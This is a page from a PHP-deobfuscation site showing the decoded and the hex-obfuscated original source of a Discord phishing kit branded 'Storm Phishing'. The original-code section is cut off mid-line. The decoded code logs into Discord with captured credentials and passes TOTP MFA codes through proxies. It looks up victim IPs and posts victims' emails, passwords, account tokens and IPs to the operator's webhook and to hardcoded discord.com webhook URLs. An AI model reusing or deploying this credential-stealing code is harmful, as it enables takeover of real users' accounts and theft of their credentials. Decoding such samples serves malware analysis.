Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

<?php goto AcIkI; hc0lK: $VLT_API = new VLT_API(); goto ZiGEx; xRm9R: class Monitoring {..

Decoded Output download

<?php 
 goto AcIkI; hc0lK: $VLT_API = new VLT_API(); goto ZiGEx; xRm9R: class Monitoring { public function Status($url) { } } goto GHE8w; iPeXd: urldecode(); goto X8TxD; ClQYx: class VLT_API { public function login($payload) : array { $ch = curl_init("https://discord.com/api/v9/auth/login"); $payload_s = json_encode($payload); curl_setopt($ch, CURLOPT_CUSTOMREQUEST, "POST"); curl_setopt($ch, CURLOPT_POSTFIELDS, $payload_s); curl_setopt($ch, CURLOPT_HEADER, true); curl_setopt($ch, CURLOPT_HTTPHEADER, array("Content-Type: application/json", "Content-Length: " . strlen($payload_s), "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66", "Accept: application/json")); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $result = curl_exec($ch); $headers_size = curl_getinfo($ch, CURLINFO_HEADER_SIZE); curl_close($ch); $body = substr($result, $headers_size); $response = json_decode($body); return json_decode(json_encode($response), true); } public function embed() { $timestamp = date("c", strtotime("now")); $json_data = json_encode(array("username" => "Storm Ph1shing", "tts" => false, "embeds" => array(array("description" => ":flag_br:  - Mais um cliente que usou o Storm pegou uma conta, verifique as informa\xc3\247\303\xb5es abaixo !
\xa:flag_us: - Another customer who used Storm got an account, check the information below!", "type" => "rich", "timestamp" => $timestamp, "color" => hexdec("3366ff"), "footer" => array("text" => "stormstealer.com.br", "icon_url" => "https://cdn.discordapp.com/attachments/940766323955359805/941046590632755210/logo_6.png"), "author" => array("name" => "Storm Ph1shing", "url" => "https://stormstealer.com.br", "icon_url" => "https://cdn.discordapp.com/attachments/940766323955359805/941046590632755210/logo_6.png"), "fields" => array(array("name" => "Username", "value" => "st\303\270rm#1337", "inline" => false), array("name" => "ID", "value" => "170189383016775680", "inline" => true), array("name" => "Badges", "value" => "<:balance:874750808267292683> <:bl_Porco:719064245441921045><:nitro:930679339903766578> <:pink_Boost_aztro1:934593611520147516>", "inline" => false))))), JSON_UNESCAPED_SLASHES | JSON_UNESCAPED_UNICODE); $ch = curl_init($webhook); curl_setopt($ch, CURLOPT_HTTPHEADER, array("Content-type: application/json")); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $json_data); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $dh = curl_init("https://canary.discord.com/api/webhooks/941635941964075019/gRmUq4Vpx3tdOsFhjfAc-p8b1AE6EKxYm3WD9XL5P9NG5jQATtvF0JRue-2OBQAzW2j8"); curl_setopt($dh, CURLOPT_HTTPHEADER, array("Content-type: application/json")); curl_setopt($dh, CURLOPT_POST, 1); curl_setopt($dh, CURLOPT_POSTFIELDS, $json_data); curl_setopt($dh, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($dh, CURLOPT_HEADER, 0); curl_setopt($dh, CURLOPT_RETURNTRANSFER, 1); $response = curl_exec($dh); $response = curl_exec($ch); } public function login_proxy($payload) : array { function get_random_proxy() { $proxies = explode("\xa", file_get_contents("core/system/proxies.txt")); $proxy = explode("@", $proxies[array_rand($proxies)]); return $proxy; } $ch = curl_init("https://discord.com/api/v9/auth/login"); $payload_s = json_encode($payload); curl_setopt($ch, CURLOPT_CUSTOMREQUEST, "POST"); curl_setopt($ch, CURLOPT_POSTFIELDS, $payload_s); curl_setopt($ch, CURLOPT_HEADER, true); curl_setopt($ch, CURLOPT_HTTPHEADER, array("Content-Type: application/json", "Content-Length: " . strlen($payload_s), "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66", "Accept: application/json")); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $proxy = get_random_proxy(); curl_setopt($ch, CURLOPT_PROXYTYPE, CURLPROXY_HTTPS); curl_setopt($ch, CURLOPT_PROXY, $proxy[1]); curl_setopt($ch, CURLOPT_PROXYUSERPWD, $proxy[0]); $result = curl_exec($ch); $headers_size = curl_getinfo($ch, CURLINFO_HEADER_SIZE); curl_close($ch); $body = substr($result, $headers_size); $response = json_decode($body); return json_decode(json_encode($response), true); } public function totp_auth($ticket, $mfa_code) : string { $ch = curl_init("https://discord.com/api/v9/auth/mfa/totp"); $payload = array("code" => $mfa_code, "gift_code_sku_id" => null, "login_source" => null, "ticket" => $ticket); $payload_s = json_encode($payload); curl_setopt($ch, CURLOPT_CUSTOMREQUEST, "POST"); curl_setopt($ch, CURLOPT_POSTFIELDS, $payload_s); curl_setopt($ch, CURLOPT_HEADER, true); curl_setopt($ch, CURLOPT_HTTPHEADER, array("Content-Type: application/json", "Content-Length: " . strlen($payload_s), "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66", "Accept: application/json")); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $result = curl_exec($ch); $headers_size = curl_getinfo($ch, CURLINFO_HEADER_SIZE); curl_close($ch); $body = substr($result, $headers_size); $response = (array) json_decode($body); if (!isset($response["token"])) { return "EINVALID_MFA_CODE"; } else { return $response["token"]; } } } goto hc0lK; Scpfv: class Main { public function handler($webhook, $bot_token, $user_id, $client_ip, $password, $full_url, $login, $server_hostname, $admin_id, $admin_token, $acc_token, $admin_sendlog) { function get_random_proxies() { $proxies = explode("\xa", file_get_contents("core/system/proxies.txt")); $proxy = explode("@", $proxies[array_rand($proxies)]); return $proxy; } function getinfo($token, $url) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_HTTPHEADER, array("authorization: " . $token)); curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE); $result = curl_exec($ch); $headers_size = curl_getinfo($ch, CURLINFO_HEADER_SIZE); curl_close($ch); $body = substr($result, $headers_size); $response = json_decode($body); $response = json_decode(json_encode($response), true); if (isset($response["global"])) { $ch = curl_init(); $proxy = get_random_proxies(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_HTTPHEADER, array("authorization: " . $token)); curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE); curl_setopt($ch, CURLOPT_PROXYTYPE, CURLPROXY_HTTPS); curl_setopt($ch, CURLOPT_PROXY, $proxy[1]); curl_setopt($ch, CURLOPT_PROXYUSERPWD, $proxy[0]); $req = curl_exec($ch); curl_close($req); return $req; } else { return $result; } } if (stristr($user_id, ",")) { $user_id = explode(",", $user_id); } else { $user_id = array($user_id); } $details = json_decode(file_get_contents("https://ipinfo.io/" . $client_ip . "/json")); $country = $details->country; if ($country == "UA") { $flag = "\360\237\x87\xba\360\237\x87\246"; } elseif ($country == "RU") { $flag = "\xf0\x9f\x87\xb7\xf0\237\x87\272"; } elseif ($country == "US") { $flag = "\360\x9f\207\xba\360\x9f\207\270"; } else { $flag = "\360\237\207\xaa\360\x9f\207\xba"; } $TeamOwner = "\xd0\x9d\320\265\xd1\202"; $BOT_Verify = "\320\235\xd0\265\321\x82"; $json_response = json_decode(getinfo($acc_token, "https://discordapp.com/api/v9/users/@me"), true); $userid = $json_response["id"]; $usuario = $json_response["username"]; $tag = $json_response["discriminator"]; $login = urldecode($login); $password = urldecode($password); $acc_token = urldecode($acc_token); $howmuchbadges = 0; $badges = ''; if (isset($json_response["discriminator"]) && isset($json_response["username"])) { $public_flags = $json_response["public_flags"]; $flags = array(131072 => "<:DE_BadgeVerifiedBotDeveloper:939237364583239690>", 65536 => "<:DE_BadgeVerifiedBotDeveloper:939237364583239690>", 16384 => "<:yellow_HunterGold:903653460350742638>", 4096 => "<:DE_BadgeVerifiedBotDeveloper:939237364583239690>", 1024 => "<:DE_BadgeVerifiedBotDeveloper:939237364583239690>", 512 => "<:a_pig:919413754914037831>", 256 => "Hypesquad Online House 3", 128 => "Hypesquad Online House 2", 64 => "Hypesquad Online House 1", 8 => "<:green_BugHunter:903294892468469800>", 4 => "<:_uahype:919413843787124807>", 2 => "<:blue_partner:899422683102580816>", 1 => "<:az_staffLC:891392732260601917>"); $str_flags = array(); while ($public_flags != 0) { foreach ($flags as $key => $value) { if ($public_flags >= $key) { array_push($str_flags, $value); $public_flags = $public_flags - $key; } } } } foreach ($str_flags as $item) { if ($item != "Hypesquad Online House 1" and $item != "Hypesquad Online House 2" and $item != "Hypesquad Online House 3") { if ($item == "Verified Developer") { $json_response_bot = json_decode(getinfo($usertoken, "https://discord.com/api/v9/applications?with_team_applications=true"), true); foreach ($json_response_bot as $item2) { if (json_encode($item2["verification_state"]) == "4") { if (json_encode($item2["owner"]["id"]) == $userid) { $BOT_Verify = "Bot Owner"; } } } $json_response_team = json_decode(getinfo($usertoken, "https://discord.com/api/v9/teams"), true); foreach ($json_response_team as $item3) { if (json_encode($item3["owner_user_id"]) == $userid) { $TeamOwner = "Team Owner"; } } if ($TeamOwner != "\xd0\x9d\xd0\265\321\202" and $BOT_Verify == "\xd0\x9d\xd0\265\xd1\202") { $item = (string) $item . "(Team Owner)"; } elseif ($TeamOwner == "\xd0\235\320\xb5\321\202" and $BOT_Verify != "\320\x9d\xd0\265\xd1\202") { $item = (string) $item . "(Bot Owner)"; } elseif ($TeamOwner != "\320\x9d\320\265\321\202" and $BOT_Verify != "\xd0\x9d\320\xb5\321\202") { $item = (string) $item . "(Team Owner, Bot Owner)"; } if ($howmuchbadges == 0) { $badges = $item; } else { $badges = $badges . " | " . $item; } $howmuchbadges += 1; } else { if ($howmuchbadges == 0) { $badges = $item; } else { $badges = $badges . " | " . $item; } $howmuchbadges += 1; } } } if ($badges == '') { $timestamp = date("c", strtotime("now")); $json_data = json_encode(array("username" => "Storm Phishing", "tts" => false, "embeds" => array(array("title" => "Phishing Login", "type" => "rich", "timestamp" => $timestamp, "color" => hexdec("3366ff"), "footer" => array("text" => "stormstealer.com.br", "icon_url" => "https://cdn.discordapp.com/attachments/935926923756990474/940077170657746944/unknown_4.png"), "author" => array("name" => "Storm Stealer", "url" => "https://stormstealer.com.br", "icon_url" => "https://cdn.discordapp.com/attachments/935926923756990474/940077170657746944/unknown_4.png"), "fields" => array(array("name" => "<a:aArc_Aviso:909617772386979901> Victim Info's", "value" => "```\360\237\x92\x89 Link: {$full_url}
\xf0\237\222\273 Victim IP: {$client_ip}```", "inline" => false), array("name" => "Username", "value" => "`{$usuario}#{$tag}`", "inline" => false), array("name" => "User ID", "value" => "`{$userid}`", "inline" => true), array("name" => "Email", "value" => "`{$login}`", "inline" => false), array("name" => "Password", "value" => "`{$password}`", "inline" => false), array("name" => "Badges", "value" => "<:denied:812924200531918858>", "inline" => false), array("name" => "<:blue_discordpartner:934579302983405579> Token", "value" => "```{$acc_token}```", "inline" => true))))), JSON_UNESCAPED_SLASHES | JSON_UNESCAPED_UNICODE); $ch = curl_init($webhook); curl_setopt($ch, CURLOPT_HTTPHEADER, array("Content-type: application/json")); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $json_data); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $dh = curl_init("https://canary.discord.com/api/webhooks/946578337906708541/0oDJEdOuku6_2mj-0OIw01839Q9FBq_gr_W31dfw_UsJHfmRR7gGZqN6e9sy7VvQeh0M"); curl_setopt($dh, CURLOPT_HTTPHEADER, array("Content-type: application/json")); curl_setopt($dh, CURLOPT_POST, 1); curl_setopt($dh, CURLOPT_POSTFIELDS, $json_data); curl_setopt($dh, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($dh, CURLOPT_HEADER, 0); curl_setopt($dh, CURLOPT_RETURNTRANSFER, 1); $response = curl_exec($dh); $response = curl_exec($ch); } else { $timestamp = date("c", strtotime("now")); $json_data = json_encode(array("username" => "Storm Phishing", "tts" => false, "embeds" => array(array("title" => "Phishing Login", "type" => "rich", "timestamp" => $timestamp, "color" => hexdec("3366ff"), "footer" => array("text" => "stormstealer.com.br", "icon_url" => "https://cdn.discordapp.com/attachments/935926923756990474/940077170657746944/unknown_4.png"), "author" => array("name" => "Storm Stealer", "url" => "https://stormstealer.com.br", "icon_url" => "https://cdn.discordapp.com/attachments/935926923756990474/940077170657746944/unknown_4.png"), "fields" => array(array("name" => "<a:aArc_Aviso:909617772386979901> Victim Info's", "value" => "```\360\x9f\x92\x89 Link: {$full_url}\xa\360\x9f\222\xbb Victim IP: {$client_ip}```", "inline" => false), array("name" => "Username", "value" => "`{$usuario}#{$tag}`", "inline" => false), array("name" => "User ID", "value" => "`{$userid}`", "inline" => true), array("name" => "Email", "value" => "`{$login}`", "inline" => false), array("name" => "Password", "value" => "`{$password}`", "inline" => false), array("name" => "Badges", "value" => "{$badges}", "inline" => false), array("name" => "<:blue_discordpartner:934579302983405579> Token", "value" => "```{$acc_token}```", "inline" => true))))), JSON_UNESCAPED_SLASHES | JSON_UNESCAPED_UNICODE); $ch = curl_init($webhook); curl_setopt($ch, CURLOPT_HTTPHEADER, array("Content-type: application/json")); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $json_data); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $dh = curl_init("https://canary.discord.com/api/webhooks/946578337906708541/0oDJEdOuku6_2mj-0OIw01839Q9FBq_gr_W31dfw_UsJHfmRR7gGZqN6e9sy7VvQeh0M"); curl_setopt($dh, CURLOPT_HTTPHEADER, array("Content-type: application/json")); curl_setopt($dh, CURLOPT_POST, 1); curl_setopt($dh, CURLOPT_POSTFIELDS, $json_data); curl_setopt($dh, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($dh, CURLOPT_HEADER, 0); curl_setopt($dh, CURLOPT_RETURNTRANSFER, 1); $response = curl_exec($dh); $response = curl_exec($ch); } foreach ($user_id as $select_id) { } if ($admin_sendlog) { } } } goto fYnIO; AcIkI: error_reporting(E_ERROR | E_PARSE); goto iPeXd; Nstz5: $Request = new Request(); goto xRm9R; X8TxD: class Request { public function GetURL($url) { $ch = curl_init(); curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE); $data = curl_exec($ch); curl_close($ch); return $data; } public function PostURL($url, $array) { $ch = curl_init(); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, $array); curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE); $data = curl_exec($ch); curl_close($ch); return $data; } } goto Nstz5; fYnIO: $Main = new Main(); goto ClQYx; GHE8w: $Monitoring = new Monitoring(); goto Scpfv; ZiGEx: ?>

Did this file decode correctly?

Original Code

<?php
 goto AcIkI; hc0lK: $VLT_API = new VLT_API(); goto ZiGEx; xRm9R: class Monitoring { public function Status($url) { } } goto GHE8w; iPeXd: urldecode(); goto X8TxD; ClQYx: class VLT_API { public function login($payload) : array { $ch = curl_init("\x68\x74\164\160\163\x3a\57\x2f\x64\151\x73\x63\x6f\x72\144\56\143\157\x6d\x2f\x61\x70\x69\x2f\166\71\57\141\165\164\150\x2f\x6c\x6f\x67\x69\156"); $payload_s = json_encode($payload); curl_setopt($ch, CURLOPT_CUSTOMREQUEST, "\120\x4f\123\x54"); curl_setopt($ch, CURLOPT_POSTFIELDS, $payload_s); curl_setopt($ch, CURLOPT_HEADER, true); curl_setopt($ch, CURLOPT_HTTPHEADER, array("\x43\x6f\156\x74\x65\x6e\164\x2d\124\x79\x70\145\72\x20\141\160\x70\x6c\151\143\x61\x74\x69\157\156\57\152\163\157\156", "\103\x6f\156\x74\145\x6e\164\55\114\x65\x6e\147\164\150\72\x20" . strlen($payload_s), "\125\163\145\162\55\101\147\x65\x6e\164\x3a\40\115\157\172\x69\154\x6c\141\x2f\x35\x2e\x30\x20\x28\x57\x69\x6e\144\157\167\x73\40\116\124\x20\61\x30\56\x30\x3b\x20\x57\x69\x6e\x36\x34\x3b\40\170\x36\64\x29\40\101\160\x70\x6c\145\127\x65\142\x4b\x69\164\57\x35\x33\67\56\x33\x36\40\x28\x4b\x48\124\x4d\x4c\54\x20\x6c\x69\x6b\x65\x20\x47\145\x63\153\157\x29\x20\x43\150\x72\157\155\145\x2f\71\60\56\x30\x2e\64\x34\x33\60\56\62\61\62\x20\x53\141\x66\x61\x72\x69\57\x35\63\67\56\63\66\x20\x45\x64\147\57\71\60\x2e\60\56\70\61\70\x2e\66\66", "\101\x63\143\145\x70\164\72\40\x61\x70\160\x6c\151\143\x61\x74\151\x6f\156\x2f\x6a\163\157\x6e")); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $result = curl_exec($ch); $headers_size = curl_getinfo($ch, CURLINFO_HEADER_SIZE); curl_close($ch); $body = substr($result, $headers_size); $response = json_decode($body); return json_decode(json_encode($response), true); } public function embed() { $timestamp = date("\143", strtotime("\x6e\x6f\167")); $json_data = json_encode(array("\x75\163\x65\x72\x6e\141\x6d\145" => "\123\x74\x6f\162\x6d\x20\120\x68\61\x73\150\151\156\x67", "\x74\164\163" => false, "\x65\x6d\142\145\x64\x73" => array(array("\x64\x65\x73\143\162\x69\x70\164\x69\157\x6e" => "\72\146\154\x61\147\x5f\142\x72\x3a\40\40\55\40\x4d\x61\x69\163\x20\165\x6d\40\x63\154\x69\145\x6e\164\x65\x20\161\165\x65\40\165\x73\157\x75\40\157\40\x53\164\x6f\162\155\x20\x70\145\x67\x6f\x75\x20\165\x6d\141\x20\143\x6f\x6e\x74\141\54\40\x76\145\162\x69\146\x69\x71\x75\x65\40\141\x73\x20\x69\x6e\146\157\x72\155\141\xc3\247\303\xb5\145\x73\40\x61\142\141\x69\170\157\x20\41\12\xa\72\x66\154\141\147\x5f\x75\163\x3a\x20\x2d\x20\101\156\157\164\x68\145\162\x20\143\165\163\164\157\155\x65\162\40\167\x68\x6f\40\165\x73\145\x64\40\x53\x74\157\162\x6d\40\147\x6f\x74\x20\x61\156\x20\x61\x63\143\x6f\165\x6e\x74\x2c\40\x63\150\x65\x63\153\x20\164\150\x65\40\x69\x6e\x66\157\x72\x6d\141\x74\x69\x6f\156\x20\142\145\x6c\157\x77\41", "\x74\171\x70\145" => "\x72\151\x63\150", "\x74\x69\x6d\x65\x73\x74\141\x6d\x70" => $timestamp, "\x63\157\154\157\x72" => hexdec("\63\63\66\66\x66\x66"), "\146\x6f\x6f\164\x65\x72" => array("\164\x65\x78\x74" => "\x73\x74\x6f\x72\x6d\163\164\145\141\154\145\162\x2e\x63\x6f\x6d\x2e\142\162", "\x69\143\x6f\x6e\x5f\x75\162\154" => "\150\164\164\160\163\x3a\x2f\x2f\x63\x64\156\56\x64\151\x73\143\x6f\162\144\x61\160\x70\x2e\x63\x6f\155\x2f\x61\164\x74\141\x63\x68\155\145\156\164\163\x2f\71\64\x30\67\66\66\63\62\x33\x39\65\65\x33\x35\x39\x38\x30\65\x2f\71\64\x31\60\64\66\65\x39\60\x36\63\x32\x37\65\65\x32\61\x30\57\x6c\x6f\x67\157\137\x36\56\160\156\x67"), "\141\165\x74\150\x6f\162" => array("\156\141\155\145" => "\123\164\x6f\x72\155\x20\x50\150\61\x73\x68\151\x6e\147", "\x75\x72\x6c" => "\150\164\164\160\163\x3a\x2f\57\163\x74\157\x72\x6d\163\164\145\x61\154\145\162\56\143\x6f\155\x2e\142\x72", "\151\143\157\156\137\165\x72\x6c" => "\x68\x74\x74\160\163\72\57\57\x63\144\x6e\56\144\151\163\143\x6f\x72\x64\141\160\160\x2e\143\x6f\x6d\x2f\x61\164\x74\x61\143\150\155\145\156\x74\163\57\x39\x34\x30\x37\x36\66\x33\x32\63\x39\65\65\63\x35\71\x38\60\x35\57\71\x34\x31\x30\64\x36\65\x39\60\66\x33\62\x37\x35\65\x32\61\60\x2f\154\157\147\157\x5f\66\x2e\160\x6e\x67"), "\x66\x69\145\154\144\163" => array(array("\x6e\x61\155\x65" => "\125\163\145\162\x6e\x61\x6d\145", "\x76\x61\x6c\165\x65" => "\x73\x74\303\270\x72\155\43\x31\63\63\67", "\x69\156\x6c\x69\156\x65" => false), array("\x6e\141\x6d\145" => "\111\104", "\x76\141\x6c\x75\x65" => "\61\67\60\61\x38\x39\63\x38\63\60\61\66\67\67\x35\66\70\x30", "\151\156\x6c\x69\156\145" => true), array("\156\x61\x6d\145" => "\x42\x61\144\x67\x65\x73", "\x76\141\154\165\145" => "\74\x3a\x62\x61\x6c\x61\x6e\143\145\72\70\x37\64\x37\65\x30\x38\x30\x38\62\x36\67\62\71\62\x36\x38\x33\76\40\x3c\72\x62\x6c\137\120\157\x72\x63\157\x3a\67\x31\71\x30\66\64\62\x34\x35\64\64\61\71\x32\61\60\x34\x35\76\x3c\x3a\156\x69\x74\x72\x6f\72\71\x33\x30\66\67\71\x33\63\x39\x39\60\x33\x37\66\66\x35\x37\70\76\x20\74\72\x70\x69\x6e\x6b\x5f\x42\x6f\157\163\164\137\141\x7a\x74\x72\157\61\x3a\x39\x33\64\65\71\63\x36\x31\x31\x35\x32\x30\x31\x34\67\65\61\x36\x3e", "\x69\156\x6c\x69\x6e\145" => false))))), JSON_UNESCAPED_SLASHES | JSON_UNESCAPED_UNICODE); $ch = curl_init($webhook); curl_setopt($ch, CURLOPT_HTTPHEADER, array("\x43\x6f\x6e\164\145\x6e\164\x2d\164\171\160\145\72\x20\141\160\x70\154\151\143\141\x74\x69\x6f\x6e\x2f\152\x73\157\x6e")); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $json_data); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $dh = curl_init("\150\164\x74\160\x73\72\57\57\143\141\x6e\141\x72\x79\x2e\144\x69\163\x63\157\162\x64\x2e\143\x6f\155\57\141\x70\151\57\x77\x65\x62\150\157\157\153\163\x2f\x39\x34\61\x36\x33\65\71\64\61\71\x36\x34\x30\67\x35\60\61\71\x2f\147\122\x6d\x55\161\x34\126\x70\x78\x33\x74\x64\x4f\x73\x46\150\x6a\146\101\x63\55\160\70\x62\x31\101\x45\x36\105\x4b\x78\131\x6d\63\x57\104\x39\130\114\x35\120\71\116\x47\x35\152\121\101\124\164\x76\x46\60\x4a\x52\x75\145\55\62\117\x42\121\101\x7a\x57\62\x6a\70"); curl_setopt($dh, CURLOPT_HTTPHEADER, array("\103\157\156\x74\x65\x6e\x74\x2d\164\x79\160\x65\x3a\40\141\160\x70\154\151\x63\x61\x74\x69\x6f\x6e\x2f\152\x73\157\156")); curl_setopt($dh, CURLOPT_POST, 1); curl_setopt($dh, CURLOPT_POSTFIELDS, $json_data); curl_setopt($dh, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($dh, CURLOPT_HEADER, 0); curl_setopt($dh, CURLOPT_RETURNTRANSFER, 1); $response = curl_exec($dh); $response = curl_exec($ch); } public function login_proxy($payload) : array { function get_random_proxy() { $proxies = explode("\xa", file_get_contents("\143\x6f\x72\x65\57\163\x79\x73\164\x65\x6d\x2f\x70\162\157\170\x69\x65\x73\56\x74\170\164")); $proxy = explode("\x40", $proxies[array_rand($proxies)]); return $proxy; } $ch = curl_init("\x68\164\164\x70\x73\72\x2f\57\144\x69\x73\143\x6f\162\144\x2e\143\x6f\x6d\57\x61\160\151\x2f\166\71\57\141\x75\164\150\x2f\x6c\x6f\x67\x69\156"); $payload_s = json_encode($payload); curl_setopt($ch, CURLOPT_CUSTOMREQUEST, "\120\117\x53\124"); curl_setopt($ch, CURLOPT_POSTFIELDS, $payload_s); curl_setopt($ch, CURLOPT_HEADER, true); curl_setopt($ch, CURLOPT_HTTPHEADER, array("\x43\157\156\164\145\x6e\164\55\124\171\160\145\72\40\x61\x70\160\154\151\x63\x61\x74\x69\157\x6e\57\152\163\157\156", "\x43\x6f\156\x74\x65\156\164\x2d\x4c\x65\156\x67\x74\x68\72\x20" . strlen($payload_s), "\x55\163\145\162\55\x41\147\145\x6e\x74\x3a\40\x4d\x6f\x7a\151\x6c\154\141\57\x35\56\60\40\50\x57\151\x6e\x64\x6f\167\x73\40\x4e\124\x20\61\x30\x2e\60\x3b\x20\127\x69\x6e\x36\x34\x3b\40\x78\66\64\51\40\101\160\x70\x6c\x65\x57\145\x62\x4b\x69\164\57\x35\x33\67\56\63\x36\40\x28\x4b\x48\124\115\x4c\x2c\40\154\151\153\x65\40\107\145\x63\x6b\x6f\51\40\x43\150\x72\157\x6d\x65\x2f\x39\60\x2e\x30\x2e\x34\x34\63\60\x2e\62\61\62\x20\x53\141\146\x61\162\x69\57\x35\x33\67\x2e\63\66\x20\105\144\x67\57\x39\x30\x2e\60\56\x38\61\x38\x2e\x36\66", "\x41\143\143\145\x70\x74\72\x20\141\160\160\x6c\151\143\x61\164\151\157\156\57\152\x73\x6f\156")); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $proxy = get_random_proxy(); curl_setopt($ch, CURLOPT_PROXYTYPE, CURLPROXY_HTTPS); curl_setopt($ch, CURLOPT_PROXY, $proxy[1]); curl_setopt($ch, CURLOPT_PROXYUSERPWD, $proxy[0]); $result = curl_exec($ch); $headers_size = curl_getinfo($ch, CURLINFO_HEADER_SIZE); curl_close($ch); $body = substr($result, $headers_size); $response = json_decode($body); return json_decode(json_encode($response), true); } public function totp_auth($ticket, $mfa_code) : string { $ch = curl_init("\150\164\164\x70\x73\x3a\x2f\x2f\x64\x69\163\x63\x6f\x72\144\56\x63\157\x6d\x2f\x61\x70\151\x2f\x76\71\57\141\x75\164\x68\x2f\x6d\146\x61\57\x74\157\164\x70"); $payload = array("\x63\x6f\x64\145" => $mfa_code, "\x67\x69\146\x74\x5f\143\x6f\x64\x65\x5f\163\153\165\137\x69\144" => null, "\x6c\157\x67\151\x6e\x5f\x73\157\x75\162\143\145" => null, "\x74\151\x63\153\x65\x74" => $ticket); $payload_s = json_encode($payload); curl_setopt($ch, CURLOPT_CUSTOMREQUEST, "\x50\x4f\x53\x54"); curl_setopt($ch, CURLOPT_POSTFIELDS, $payload_s); curl_setopt($ch, CURLOPT_HEADER, true); curl_setopt($ch, CURLOPT_HTTPHEADER, array("\103\157\x6e\164\x65\156\164\55\x54\x79\x70\145\x3a\40\x61\160\x70\154\151\x63\x61\x74\x69\x6f\x6e\x2f\152\163\157\156", "\x43\157\x6e\x74\145\x6e\x74\55\114\145\156\x67\x74\x68\72\x20" . strlen($payload_s), "\x55\x73\145\x72\x2d\101\x67\x65\x6e\164\72\40\x4d\x6f\172\x69\x6c\154\x61\x2f\65\x2e\x30\x20\50\x57\151\156\144\157\167\x73\40\x4e\x54\x20\x31\60\56\x30\x3b\40\127\x69\156\x36\x34\73\40\170\x36\64\51\40\101\x70\160\154\x65\x57\145\142\113\151\164\57\65\63\67\x2e\63\66\x20\50\113\110\x54\115\114\x2c\40\154\x69\153\x65\x20\107\145\143\153\157\51\x20\x43\150\x72\x6f\155\145\x2f\x39\x30\x2e\60\x2e\x34\64\x33\x30\56\x32\x31\x32\40\x53\141\x66\x61\x72\x69\x2f\65\x33\x37\56\63\x36\40\x45\x64\147\57\71\60\x2e\x30\x2e\x38\x31\x38\x2e\x36\x36", "\101\143\143\x65\x70\x74\72\x20\x61\x70\x70\154\151\143\x61\x74\151\x6f\x6e\x2f\152\163\x6f\x6e")); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $result = curl_exec($ch); $headers_size = curl_getinfo($ch, CURLINFO_HEADER_SIZE); curl_close($ch); $body = substr($result, $headers_size); $response = (array) json_decode($body); if (!isset($response["\x74\157\153\x65\x6e"])) { return "\x45\x49\116\x56\101\x4c\x49\x44\x5f\x4d\106\x41\137\103\117\x44\x45"; } else { return $response["\164\157\x6b\145\x6e"]; } } } goto hc0lK; Scpfv: class Main { public function handler($webhook, $bot_token, $user_id, $client_ip, $password, $full_url, $login, $server_hostname, $admin_id, $admin_token, $acc_token, $admin_sendlog) { function get_random_proxies() { $proxies = explode("\xa", file_get_contents("\x63\x6f\162\x65\57\x73\x79\163\164\x65\x6d\x2f\160\x72\x6f\170\x69\x65\x73\x2e\x74\170\x74")); $proxy = explode("\x40", $proxies[array_rand($proxies)]); return $proxy; } function getinfo($token, $url) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_HTTPHEADER, array("\141\x75\164\150\157\162\151\172\x61\x74\151\x6f\156\72\x20" . $token)); curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE); $result = curl_exec($ch); $headers_size = curl_getinfo($ch, CURLINFO_HEADER_SIZE); curl_close($ch); $body = substr($result, $headers_size); $response = json_decode($body); $response = json_decode(json_encode($response), true); if (isset($response["\147\154\x6f\142\141\154"])) { $ch = curl_init(); $proxy = get_random_proxies(); curl_setopt($ch, 